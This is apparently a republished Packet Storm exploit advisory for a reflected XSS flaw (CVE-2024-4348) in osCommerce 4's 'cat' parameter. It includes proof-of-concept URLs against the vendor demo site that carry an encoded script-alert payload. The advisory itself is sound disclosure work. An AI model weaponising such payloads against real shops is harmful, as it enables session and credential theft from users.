osCommerce 4 Cross Site Scripting
2024-4-30 23:54:57 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: osCommerce 4 - Reflected XSS
# Exploit Author: skalvin
# Date: 22/04/2024
# Vendor: osCommerce ltd.
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://demo.oscommerce.com/
# Demo Link: https://demo.oscommerce.com/furniture/
# Tested on: Windows 11 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2024-4348
# VDB: VDB-262488
# CWE: CWE-79 / CWE-74 / CWE-707
# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250
# ATT&CK: T1059.007

## Description

Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

GET parameter 'cat' is vulnerable to RXSS

Path: /furniture/catalog/all-products

https://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]
https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]

## Live POC:

https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1

https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1

[-] Done


文章来源: https://packetstormsecurity.com/files/178375/oscommerce4cat-xss.txt
如有侵权请联系:admin#unsafe.sh